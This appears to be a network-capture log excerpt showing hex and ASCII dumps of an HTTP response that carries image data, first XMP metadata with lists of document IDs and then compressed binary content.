                                                                                                                                                                                    2023-01-05 07:58:10 UTC1617INData Raw: 44 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 35 44 33 38 44 32 33 35 46 32 39 45 30 31 31 38 42 38 46 46 32 44 45 34 33 44 39 41 43 32 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 35 45 30 45 45 46 34 30 41 33 45 31 31 45 32 42 33 35 33 42 44 41 32 37 38 30 41 34 43 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 36 30 36 35 35 42 34 30 45 32 30 36 38 31 31 38 41 36 44 45 42 45 37 39 34 43 35 31 41 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 36 31 39 32 33 37 46 44 39 32 31 36 38 31 31 39 31 30 39 44 38 30 46 43 42 42 33 41 33 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d
                                                                                                                                                                                    Data Ascii: D35</rdf:li> <rdf:li>xmp.did:E5D38D235F29E0118B8FF2DE43D9AC2A</rdf:li> <rdf:li>xmp.did:E5E0EEF40A3E11E2B353BDA2780A4C9A</rdf:li> <rdf:li>xmp.did:E60655B40E2068118A6DEBE794C51A86</rdf:li> <rdf:li>xmp.did:E619237FD92168119109D80FCBB3A330</rdf:li> <rdf:li>xm
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1672INData Raw: 3a 46 37 37 46 31 31 37 34 30 37 32 30 36 38 31 31 39 44 31 45 44 36 43 38 42 37 32 41 39 45 31 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 37 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 30 33 32 45 36 41 34 41 36 35 38 34 42 34 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 37 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 30 45 43 44 34 46 37 37 35 43 35 39 37 34 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 37 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 31 41 46 42 34 31 45 39 44 30 45 46 36 42 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 37 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 32 31 33 41 44
                                                                                                                                                                                    Data Ascii: :F77F1174072068119D1ED6C8B72A9E1B</rdf:li> <rdf:li>xmp.did:F77F117407206811A032E6A4A6584B41</rdf:li> <rdf:li>xmp.did:F77F117407206811A0ECD4F775C59741</rdf:li> <rdf:li>xmp.did:F77F117407206811A1AFB41E9D0EF6B9</rdf:li> <rdf:li>xmp.did:F77F117407206811A213AD
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1680INData Raw: 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 45 30 32 31 38 34 33 42 30 42 41 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 33 44 31 41 46 37 41 30 30 46 33 36 39 33 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 33 44 31 42 33 39 35 30 44 36 37 35 30 35 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 41 38 30 31 44 32 43 37 34 37 37 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 38 43 36 41 41 46 43 35 42 45 30
                                                                                                                                                                                    Data Ascii: 17407206811822AE021843B0BAD</rdf:li> <rdf:li>xmp.did:FA7F11740720681183D1AF7A00F36933</rdf:li> <rdf:li>xmp.did:FA7F11740720681183D1B3950D675054</rdf:li> <rdf:li>xmp.did:FA7F117407206811871FA801D2C74778</rdf:li> <rdf:li>xmp.did:FA7F11740720681188C6AAFC5BE0
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1712INData Raw: 37 37 39 2d 34 36 32 35 2d 61 65 34 62 2d 66 30 36 38 61 31 34 66 34 35 61 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 61 66 39 64 62 31 34 65 2d 37 66 63 39 2d 61 66 34 64 2d 38 33 34 35 2d 38 34 38 64 35 62 61 62 33 64 31 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 61 66 65 35 38 30 64 31 2d 32 36 65 37 2d 34 64 62 64 2d 38 36 66 36 2d 31 39 33 31 38 66 36 32 32 62 39 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 61 66 66 34 64 63 34 34 2d 35 66 63 30 2d 34 64 63 63 2d 61 30 64 30 2d 38 38 62 31 31 32 31 35 33 39 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 30 31 64 62 34 32 31 2d 61 37 61 63 2d 63 35 34
                                                                                                                                                                                    Data Ascii: 779-4625-ae4b-f068a14f45a8</rdf:li> <rdf:li>xmp.did:af9db14e-7fc9-af4d-8345-848d5bab3d17</rdf:li> <rdf:li>xmp.did:afe580d1-26e7-4dbd-86f6-19318f622b9b</rdf:li> <rdf:li>xmp.did:aff4dc44-5fc0-4dcc-a0d0-88b112153961</rdf:li> <rdf:li>xmp.did:b01db421-a7ac-c54
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1728INData Raw: 65 35 63 38 32 30 35 61 33 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 64 63 65 66 35 39 34 64 2d 61 30 61 35 2d 34 63 35 33 2d 38 63 61 39 2d 39 62 36 33 34 65 66 66 39 36 38 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 64 63 65 66 64 35 66 61 2d 66 34 39 30 2d 36 62 34 64 2d 38 34 62 33 2d 30 30 38 33 35 66 35 32 66 31 62 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 64 63 66 36 64 38 30 61 2d 66 61 33 63 2d 39 32 34 32 2d 62 35 32 63 2d 65 38 30 61 35 31 63 33 36 31 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 64 63 66 38 35 66 33 36 2d 61 61 31 39 2d 35 62 34 35 2d 39 61 39 39 2d 39 64 36 63 34 66 66 38 65
                                                                                                                                                                                    Data Ascii: e5c8205a36</rdf:li> <rdf:li>xmp.did:dcef594d-a0a5-4c53-8ca9-9b634eff968e</rdf:li> <rdf:li>xmp.did:dcefd5fa-f490-6b4d-84b3-00835f52f1b7</rdf:li> <rdf:li>xmp.did:dcf6d80a-fa3c-9242-b52c-e80a51c36132</rdf:li> <rdf:li>xmp.did:dcf85f36-aa19-5b45-9a99-9d6c4ff8e
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1736INData Raw: 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 32 35 66 61 37 66 63 2d 33 61 30 39 2d 35 66 34 66 2d 61 66 33 64 2d 62 31 32 30 65 39 65 37 38 34 37 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 32 36 31 32 33 66 66 2d 32 33 38 30 2d 38 34 34 39 2d 61 63 62 38 2d 34 30 65 61 31 65 61 32 34 31 63 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 32 37 32 38 30 35 39 2d 37 31 39 64 2d 61 62 34 65 2d 61 38 62 62 2d 62 62 64 66 36 66 31 63 65 66 36 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 32 61 33 35 66 32 61 2d 35 36 36 65 2d 34 62 66 61 2d 62 64 34 66 2d 61 64 66 33 37 34 66 38 39 34 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64
                                                                                                                                                                                    Data Ascii: li> <rdf:li>xmp.did:f25fa7fc-3a09-5f4f-af3d-b120e9e7847f</rdf:li> <rdf:li>xmp.did:f26123ff-2380-8449-acb8-40ea1ea241c7</rdf:li> <rdf:li>xmp.did:f2728059-719d-ab4e-a8bb-bbdf6f1cef6b</rdf:li> <rdf:li>xmp.did:f2a35f2a-566e-4bfa-bd4f-adf374f89432</rdf:li> <rd
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1752INData Raw: 64 7c dd 73 22 71 91 b4 57 d9 5f 55 72 11 ee af 71 ac ad 7c 6c ad a0 31 b4 83 ec 27 19 da c3 7c df 96 3f 3b e7 e6 54 63 f3 da 1b 74 0d e1 94 f4 74 f6 45 7a 37 3f 6a 9f 57 13 cd cf 8c d9 03 27 3c f3 d3 a2 4b 14 fe 8b ed ed 2b a2 62 ba 2c bc 00 ac c6 a4 45 60 1e 40 d1 01 43 96 cd ba b5 19 7c 4d 31 ae 35 2b 07 53 0a 1d 5c 29 85 73 57 08 c6 98 78 e8 07 db 57 0f 63 07 78 68 da b8 d8 19 06 41 d9 68 4c df 74 72 56 9a 29 3a 6e 74 dc 85 26 a3 ea a4 95 3b 8d 3b 7b 11 48 f9 25 39 b8 77 8d f1 06 b3 cc 8c 4a 90 a5 a1 64 05 76 ce 2b 4a 30 c9 d3 c0 c1 5b 63 ed aa 34 03 b6 dd 6b 3b f7 7a 9d 42 2a 44 6d ed a0 88 3a 9b 64 cb 9b 26 4c b0 e9 8b cc 5b f1 e5 44 a9 d3 b7 b6 9c 7c 44 e1 ed ae 18 84 a1 f2 e8 63 1b b6 e7 eb 63 1b 1c 8f aa 3d b0 c1 b6 ab 8f 95 09 53 ed b2 23 33 b3
                                                                                                                                                                                    Data Ascii: d|s"qW_Urq|l1'|?;TcttEz7?jW'<K+b,E`@C|M15+S\)sWxWcxhAhLtrV):nt&;;{H%9wJdv+J0[c4k;zB*Dm:d&L[D|Dcc=S#3
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1768INData Raw: b3 76 93 61 d2 76 7b 05 40 38 0e 50 f3 bd 11 b8 23 0d 7c 70 6d b8 7a ed ed bd 85 d9 47 c3 1d b4 1b 6c a4 46 81 54 d7 1d 5a 5a 6d 8a 36 9b 59 54 5a 12 67 aa 5f 51 9f f2 15 d4 3b 92 40 d9 9c 21 72 89 16 39 3f 5c b2 38 f4 02 51 7c 45 f1 3f 06 2a cb d9 6c 54 a4 a6 81 0f 55 d4 36 60 34 88 5a fb 76 6a a8 eb f7 4a b8 df 9e bc 00 b7 33 28 ba 4a ab 29 87 32 cf 39 f5 97 a9 55 50 1a a8 b5 54 97 4b a9 23 65 ed b0 2c 62 85 cc 6b 85 a6 3e 87 e5 f3 e6 d9 17 57 68 96 6c c7 2b 78 a0 3d 16 7b c5 c0 5a 32 2e 8b f2 dd 3d 57 61 d1 c3 62 2c 9f a3 9f 3c ac 65 96 9a f5 3c 67 96 ed 5d e4 4c 5c 5c 88 74 23 d3 2a b6 d9 03 17 20 4f 39 9d 5c f1 74 eb f4 bf 3c b1 1c 47 5d 3c db bc f3 fa 13 77 cf 08 af 3d de 6e eb ab 21 cc 04 9b 60 2d d3 4b 3f e4 24 31 f3 85 3d d1 0b ab 9c 6b eb 8c da
                                                                                                                                                                                    Data Ascii: vav{@8P#|pmzGlFTZZm6YTZg_Q;@!r9?\8Q|E?*lTU6`4ZvjJ3(J)29UPTK#e,bk>Whl+x={Z2.=Wab,<e<g]L\\t#* O9\t<G]<w=n!`-K?$1=k
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1776INData Raw: 2d d8 4c 54 51 62 52 72 f7 be 37 19 49 8d 0a 97 a6 d2 e0 20 cb 7a 6a fd 7d 1e 0b af 85 65 7a fa 58 62 de cf 79 4a 7b 71 a3 ac d8 44 f3 d6 a6 a7 33 82 2a b1 a9 7e 9f 8b a7 16 0b a9 33 c7 3c ab 90 f3 58 f4 5c cc e2 2e 9e c9 91 df 5b f1 a7 c8 75 5b 27 64 57 0c 56 4a a8 4b 50 62 5b 07 96 2a bf 4c ab f1 a9 c8 35 08 15 d5 19 f9 dc d3 8c b1 f6 3a ed 93 23 14 c3 66 2b 9a bd 27 30 4b da 56 ae 61 a8 99 e6 58 a3 64 44 ef 4e aa 0d a8 92 05 7e e5 5b b2 85 79 97 46 93 6f 98 f5 f3 6a d5 46 e9 e1 4b 3c 9b e9 b7 9b fd 03 83 a5 94 36 0a 88 3b b9 74 8b 00 78 f5 6a 73 16 53 34 c4 5a 74 4c 9d 38 b2 28 47 96 ec 29 e3 4c 6b 93 53 0b 52 42 b7 71 c5 97 55 12 f7 02 61 5e 7e ec 54 61 4a 3b 88 a6 52 db f4 4c 8b c1 08 ec 27 20 5b ab 20 fd a7 24 90 d2 14 bb 2d 70 ff 00 9b b9 6c 98 5b
                                                                                                                                                                                    Data Ascii: -LTQbRr7I zj}ezXbyJ{qD3*~3<X\.[u['dWVJKPb[*L5:#f+'0KVaXdDN~[yFojFK<6;txjsS4ZtL8(G)LkSRBqUa^~TaJ;RL' [ $-pl[
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1792INData Raw: e4 2b ba 0d 72 99 5c 4c 9a a2 99 b0 01 d4 3a a5 8a b3 b4 1a 32 3a f3 fa d7 f0 15 7e a4 d1 d7 65 8d 11 ce b4 47 8d b2 18 9c b7 9a c1 38 b1 b6 5a 3e 61 05 02 a7 c4 94 74 ed ed b1 cf 38 e9 86 4a 6a c0 80 d6 03 23 88 5a 68 26 31 6d 72 68 17 20 e3 be f6 3e 5d f5 0f 3a 4e a8 45 a1 e6 b4 c3 a5 f2 49 c4 d7 0b 59 28 6a d1 c0 22 ad 3b 86 eb 65 ce 91 d1 4b f4 ef 30 48 98 74 62 15 4f 48 99 ce df 44 84 3e 69 dd d0 cf cc 67 1c 82 6e 79 df 40 b0 c7 21 28 4c ff 00 88 9c c1 70 89 b7 97 31 6b 6a d3 02 d6 19 6a e2 0b 27 a2 a2 48 bb 79 ce 50 8a b4 23 0c f3 60 6c 42 b1 38 e7 40 5f a1 c8 87 8b b8 a8 55 84 29 d2 46 b8 da 7c dd 57 ae e4 e8 57 69 26 a1 65 cf 46 52 89 e9 20 ec ed e7 ce 0e 06 a3 e6 76 25 ac d9 9f 3f 56 34 e5 de 17 e5 3a e4 50 39 92 e2 67 1a b0 65 6f df cb ef 3f ba
                                                                                                                                                                                    Data Ascii: +r\L:2:~eG8Z>at8Jj#Zh&1mrh >]:NEIY(j";eK0HtbOHD>igny@!(Lp1kjj'HyP#`lB8@_U)F|WWi&eFR v%?V4:P9geo?
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1808INData Raw: 19 99 99 98 86 19 89 c6 63 e3 33 33 33 33 33 30 7c 0f 8c 43 50 26 d6 c4 18 b0 64 a8 0f 32 70 3f 6c 43 9f 80 73 f0 4e 22 9c 8c 4c 43 e2 64 4b 6c 2a 2e b1 dc 56 14 0d 8b b1 2b af 02 a2 c4 92 cc c8 e5 c9 fc 96 c4 e4 0c cf 91 76 08 21 a0 30 db 88 2f e5 11 79 06 03 2e 03 ce 41 67 f8 23 10 38 01 07 85 38 1e 0c 2d ca 1f d9 04 03 33 8e 43 78 81 49 8c 87 3f c8 39 37 01 15 c3 86 e3 95 56 58 e8 d6 47 52 b1 32 0d 9f b6 66 02 01 b2 de 5f 21 b2 33 e2 ab 38 95 b1 4c c6 26 67 23 01 30 46 70 b1 ee 66 98 98 cc f1 f0 d6 45 04 c2 b8 81 71 14 7c 1f 93 33 f0 61 f1 3f 1f 1f 98 07 c0 f8 c4 26 67 e0 8f 2a 66 73 f2 44 cc 07 e3 13 3f a3 f3 0a e6 14 22 62 62 63 e4 09 8f 8c 4c 40 20 10 09 89 89 c6 71 9c 67 18 16 71 98 f9 02 62 62 71 9c 67 19 c2 7d 70 57 0d 78 8f ae ac 76 94 92 fa 84
                                                                                                                                                                                    Data Ascii: c333330|CP&d2p?lCsN"LCdKl*.V+v!0/y.Ag#88-3CxI?97VXGR2f_!38L&g#0FpfEq|3a?&g*fsD?"bbcL@ qgqbbqg}pWxv
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1839INData Raw: f3 91 39 ce 40 c2 d9 97 63 04 f9 0c 0a 96 e2 4e 41 29 c4 21 20 e4 18 57 24 3f 96 24 45 70 0d 95 89 92 91 1d 5e 71 0e 2c cc b0 b1 83 20 a2 88 f4 f9 47 19 cf 10 b6 86 1f 89 99 88 00 80 4e 33 10 0c 40 23 fe d9 88 21 99 9f 88 bf 9c 89 cb 8c 2c 0c e6 0f c1 7c 45 b4 34 0c 09 18 98 98 c4 2d fa 09 cc c4 00 4f c4 cc cc e5 1c 90 2c 36 f2 c3 21 fa 2b b1 8f 11 16 ca f9 eb 53 56 16 a5 86 81 14 cf 00 2b 47 ad 8c 0a 22 63 1b 94 bb 9f a3 e9 2b e0 59 7f 18 bf 73 3d e4 a0 42 08 22 5a fc 23 a1 70 b8 40 c5 b2 8b 80 c0 90 3c 05 68 d8 85 73 01 8a be 09 c0 5d 83 9b 73 61 51 89 e7 09 6f 39 f7 28 26 e0 c6 aa d5 18 59 e1 2b e3 14 10 02 95 00 4e 62 58 b9 3c 56 08 26 31 05 82 39 e3 33 10 99 9f 0c cd 00 cc 22 28 22 19 98 b6 12 73 3f 3f 03 cc 31 9b 10 46 39 0b 33 9f 90 61 10 08 3c 40
                                                                                                                                                                                    Data Ascii: 9@cNA)! W$?$Ep^q, GN3@#!,|E4-O,6!+SV+G"c+Ys=B"Z#p@<hs]saQo9(&Y+NbX<V&193"("s??1F93a<@
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1855INData Raw: 15 d5 c6 35 81 48 13 38 83 cc bd 09 38 cc 75 c8 a2 ab 1d c4 c7 c9 38 9f 9f 8c e6 37 e2 cd 7f ae d0 01 8a a4 00 9e 60 99 82 62 63 fe 21 f1 88 44 ce 20 13 3f 07 e0 41 08 cc 2c 14 7d 90 3c b1 f1 16 b3 94 5c 42 71 12 ac 10 fc 65 90 d2 6c 85 70 46 59 9b c0 24 18 0f 02 09 69 b1 96 63 42 89 60 57 24 4e 39 8c 7c 58 df 70 24 b0 af ca bd 8c 1a b2 63 55 fb b0 4c 68 a3 03 f1 08 06 09 98 5b 13 30 5a 30 40 68 50 18 b4 85 84 90 6c b4 24 fb 03 05 07 00 cf 10 12 26 0c 2b 88 de 60 5e 00 0f 2e 00 83 c4 7f c0 1e 00 c4 07 3f f3 ec d4 6c 5b 47 10 2b 11 8a 2a b2 12 cb 46 65 55 b2 15 cf c9 9b 6a 18 27 fd d5 70 d1 50 0f 8c 43 18 cc 66 56 08 03 30 91 9c e6 3e 25 89 cc 22 19 99 f9 f8 fc 7c e7 e1 b2 08 30 18 46 07 e6 52 8e 42 8e 25 1b 88 43 39 83 0f e5 7f 71 61 c6 25 ca 05 2a 58 3a
                                                                                                                                                                                    Data Ascii: 5H88u87`bc!D ?A,}<\BqelpFY$icB`W$N9|Xp$cULh[0Z0@hPl$&+`^.?l[G+*FeUj'pPCfV0>%"|0FRB%C9qa%*X:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1887INData Raw: 27 18 66 66 7c 86 99 84 c2 66 60 30 98 1a 72 84 c6 8a 31 04 cc 30 ce 78 9c a3 9c 40 f3 97 90 d0 79 84 0f 80 71 3f 10 b4 0f 0d 82 72 cf c3 60 83 e0 f2 cc 38 13 13 8e 01 f1 09 99 99 80 ff 00 f8 b4 42 c5 b5 82 06 a9 50 17 2f 0a 95 15 d2 14 5d 5f 25 fa da b3 75 c5 8a 12 e2 eb 42 84 d9 77 36 e9 3d 72 a0 5a 3a 70 64 d3 c3 3d eb 59 b2 f5 23 99 23 e2 ab 78 43 61 68 84 20 b1 02 2b 0c 1f d3 9f f8 47 e8 c7 e8 fc 7e bc 4c 7c fe 7e 73 f0 0c 0f 99 ca 06 f8 71 18 43 f1 89 8c ce 31 56 71 02 66 2b 41 e6 3a e0 a1 c1 ae c9 8c c2 71 01 f8 23 e3 f1 14 9f 8b 14 88 1b 10 59 3f 30 a4 74 c4 cf cf 2c 41 64 cc c9 81 a6 26 31 31 08 99 86 09 ca 66 72 84 c3 9c 93 03 e2 17 87 cc c4 03 33 13 30 13 33 33 88 61 99 9c bc 67 31 04 46 80 e6 13 04 fc fc 11 0c 26 13 89 e6 2c 30 7c 13 f3 c6 05
                                                                                                                                                                                    Data Ascii: 'ff|f`0r10x@yq?r`8BP/]_%uBw6=rZ:pd=Y##xCah +G~L|~sqC1Vqf+A:q#Y?0t,Ad&11fr3033ag1F&,0|
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1895INData Raw: 02 d8 c4 a9 e5 39 40 86 00 3e 39 66 13 3f 30 89 9c 42 63 18 21 f8 18 83 c8 cf ce 7c e2 08 04 1e 63 78 84 42 33 f1 f8 98 9f e7 e5 63 c6 f0 71 9f 8f c4 06 0f 30 88 07 c0 9f 99 fe 67 e2 09 cb 11 6c 02 07 99 9c a7 29 ca 67 3f a3 10 88 47 c3 4c 91 0b 19 cf 10 3c 0f 98 2d 9f 64 fb 27 d9 05 93 96 61 33 94 62 61 cc cc 63 16 29 2d 3e 82 46 be b6 20 33 77 61 7e b0 5a d1 fc 67 21 29 e2 26 7c dd 6a 82 08 68 06 21 31 aa 16 04 d1 28 50 7e de 20 81 58 88 04 75 0a 6d 5e 12 9d b5 b9 ab b3 ea 8e c5 83 38 04 0c 80 98 96 27 18 0c 6f de 9f 18 ff 00 84 7e 8c 4c 4c 7c 62 71 9c 67 13 30 7e 73 f3 99 99 ca 78 84 7c 79 f8 cc cf e9 c7 e9 c4 e3 38 c3 5c 23 10 83 32 0c 18 33 c4 5f 07 c1 24 62 13 07 98 04 1e 08 33 33 c9 9c a0 83 02 72 02 08 c0 08 df 9c b1 8c 71 38 f1 09 9c 2b 98 cc a4
                                                                                                                                                                                    Data Ascii: 9@>9f?0Bc!|cxB3cq0gl)g?GL<-d'a3bac)->F 3wa~Zg!)&|jh!1(P~ Xum^8'o~LL|bqg0~sx|y8\#23_$b33rq8+
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1961INData Raw: 40 3e 0c 35 e0 95 24 2a f1 0c c0 4e 43 e1 7c c6 5c 42 61 31 4e 7e 07 c6 66 7f 51 85 84 0e 09 e4 21 b3 12 c6 e2 0b 85 19 39 0e 0c 29 c4 91 98 8c 54 0c c5 78 5b 30 93 8f ff 00 64 c8 83 c8 02 13 2b b0 10 11 44 f1 0e 21 1c 63 dd c6 3b 96 2c be 38 f2 9f 5e 49 4c 4e 2c 02 1c 14 c3 aa 64 1f cf c5 80 e6 86 f3 63 10 79 e2 26 49 65 06 13 0b 66 7e 7e 2b a8 b4 2b c2 36 63 3f c1 5e 31 7f 3f e7 c4 23 e2 b6 cc e4 72 53 c9 13 8f 9e 38 85 c0 8a 06 0d 80 c3 29 b1 54 06 39 6b 02 80 32 45 60 40 38 01 e6 29 10 89 82 20 85 72 49 cc 5f 10 37 86 38 83 20 39 c1 94 98 be 4a 88 2b 20 62 08 0e 09 06 2a 83 2c 02 12 61 38 00 64 95 c4 e3 08 24 a8 cc 01 56 1e 31 ec 8d 6b 08 b6 e4 31 c1 45 29 38 1c 92 16 2d 84 4c f2 9c bc 12 44 c7 08 0f 10 ec 78 e0 ce 44 40 c3 27 f7 4f 02 1b 97 02 f0 20
                                                                                                                                                                                    Data Ascii: @>5$*NC|\Ba1N~fQ!9)Tx[0d+D!c;,8^ILN,dcy&Ief~~++6c?^1?#rS8)T9k2E`@8) rI_78 9J+ b*,a8d$V1k1E)8-LDxD@'O
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1977INData Raw: 80 0b 83 01 8e e0 41 60 68 f0 7e e8 73 92 49 20 60 1f 32 ac ac c4 e2 04 75 c9 23 c9 6c 80 62 60 fc 62 66 2a f9 52 44 23 30 18 0f 9e 33 8c 00 a8 66 c9 10 e7 01 e0 6c 16 f2 54 78 2d ce 05 26 7d 9c 23 37 28 60 33 9f 96 12 a1 c6 63 91 d7 40 4b 31 82 5a a1 85 47 13 9c fc c2 b9 3f 88 a7 c9 10 cc 46 38 1f 85 52 04 0d e7 07 24 18 44 18 10 10 85 9b 90 18 13 22 16 c4 04 e4 c1 01 8b 09 33 39 9e 66 7c 0f 8c cc c2 66 7e 08 84 e2 31 8b 91 01 30 18 66 61 33 39 98 98 8d 17 cc c6 26 67 e2 66 03 0c 26 16 06 67 13 30 b6 27 2c 42 f1 41 8a b2 b3 92 2a 18 16 71 16 37 ee 3e 61 06 03 88 13 90 75 65 80 c5 f2 00 2b 01 c4 e5 89 92 63 d7 88 bf ba 71 c4 3e 22 8c 7c 0f 30 cc e0 13 98 c4 ac e7 83 9c 4a ce 27 12 5b 32 b6 00 b7 80 c6 67 cf fc 06 0f 9c f9 a8 83 08 13 10 fc 0c 09 c8 60 f9
                                                                                                                                                                                    Data Ascii: A`h~sI `2u#lb`bf*RD#03flTx-&}#7(`3c@K1ZG?F8R$D"39f|f~10fa39&gf&g0',BA*q7>aue+cq>"|0J'[2g`
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1985INData Raw: d9 a6 fb 57 66 9b 7e dd bd 8b 35 ec b3 52 94 b6 de eb af 7e 8b 6f 4f 88 d2 d7 dd d6 61 57 49 a1 b6 dd 86 a3 f5 ba b4 e9 9e d7 77 b3 d6 a8 ec 77 cd bb bd b5 d4 77 7d 87 47 77 43 bd 5d b7 36 f7 f1 f7 7b 3e c7 63 41 34 fd ae 9d 39 ed a7 57 f9 14 76 77 6a 55 d2 55 ad db df ec 7d 7d 36 77 ba 3a d7 df 6e e7 7a 5b 43 41 35 f8 6e 58 8e f8 8c 21 02 7e 21 1e 30 27 e0 79 30 0f 18 18 c7 93 e6 7e 4f 8c 99 f9 9f 98 46 0c 23 23 18 38 0b 38 c1 f9 03 cf 18 7c 02 39 12 b0 ae 60 19 38 9c 21 06 60 9f 82 39 46 07 04 11 08 27 e0 0f 81 91 15 88 8e dc a1 1e 4a f1 00 79 e2 09 c0 85 3c 60 98 0f 18 ba f6 b2 d3 5a 3c 64 22 5e 19 a2 39 ad ac bc b8 fa cb 1e 97 55 2e 27 4f ea 5b f6 5e a5 db da b2 c7 b7 6d 99 55 8a 91 71 26 bb 9d 5b 55 17 ea 7d 84 a8 76 5d 80 62 ee 1e 75 3b 05 5b b7 d8
                                                                                                                                                                                    Data Ascii: Wf~5R~oOaWIwww}GwC]6{>cA49WvwjUU}}6w:nz[CA5nX!~!0'y0~OF##88|9`8!`9F'Jy<`Z<d"^9U.'O[^mUq&[U}v]bu;[
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2001INData Raw: d3 71 2a 5a d1 87 27 28 90 a0 2a e0 00 4f ee 17 e2 1b f2 5a f6 12 cb 08 96 de 48 e7 05 c4 41 b2 20 d9 c1 af 67 10 6d a9 8f b6 82 1d 99 5b 87 80 66 63 10 b2 80 5c 08 cf 3e ef 2d 7e 21 d8 50 1f 69 56 36 da 98 dd 9e 05 1d ab 19 d8 ba 5d ad ed 1d 7f 75 76 a6 ee 9e cf 63 da f6 1a 1b 1d 36 d2 87 a7 72 8d 0d ca af d2 d3 b7 71 ba aa f6 75 fb 5f 60 ef b4 fb 4e d7 a7 f6 2d de bb 5d fd cb d8 aa af 4b fb 1b 64 2e cd 6c 6c bb 4d ee 63 d0 f6 76 a5 f6 6c 75 1b 7d dd fb 7b c2 ad 4e ca cb e9 ec 5b 53 65 7b 7b ea 4a fb 2b 2d 1e c5 da 52 d3 da 7a 6d 1d be d7 a8 e9 f4 7b 8d 87 1a da 9a 17 f6 1b 3e 8c 7d bf 62 8d 8e c3 d7 3d 2f ab de e8 3d a3 ad 1b d4 ff 00 57 5d 66 ff 00 6d fd a1 d2 6c f4 fd 98 f0 71 98 06 21 c6 38 e2 08 7c c1 f0 44 2b 31 32 32 3c 43 e7 e3 88 85 61 13 18 9f
                                                                                                                                                                                    Data Ascii: q*Z'(*OZHA gm[fc\>-~!PiV6]uvc6rqu_`N-]Kd.llMcvlu}{N[Se{{J+-Rzm{>}b=/=W]fmlq!8|D+122<Ca
